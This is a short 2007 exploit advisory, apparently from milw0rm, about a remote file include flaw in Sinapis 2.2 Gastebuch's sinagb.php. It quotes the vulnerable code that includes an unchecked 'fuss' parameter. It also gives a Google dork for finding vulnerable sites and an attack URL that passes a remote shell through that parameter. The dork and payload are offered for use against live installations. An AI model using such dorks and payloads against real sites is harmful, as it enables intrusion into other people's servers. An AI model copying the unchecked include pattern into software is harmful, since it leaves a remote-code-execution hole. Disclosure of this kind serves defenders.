Lucene search

K

SecurityvulnsSECURITYVULNS:DOC:16185

HistoryFeb 25, 2007 - 12:00 a.m.

Sinapis 2.2 Gastebuch (sinagb.php fuss) Remote File Include Vulnerability

2007-02-2500:00:00

vulners.com

33

Sinapis 2.2 Gastebuch

Found by kezzap66345 *

Script:
http://www.scripter.ch/start.php?id=41.18.9&pos=gb&title=Sinapis%20G�stebuch%20<img%20src=/pics/gbscr.gif>

Dork="inurl:sinagb.php"

ERROR:

if($fuss == ""){
echo "</body></html>";}
else{
include($fuss);} <<< rfi coded

RFI:

http://SITE.com/path//sinagb.php?fuss=[SHELL]

kezzap66345[at]hotmail[dot]com

thanx=x0r0nstr0keshika****************************************************

milw0rm.com [2007-02-23]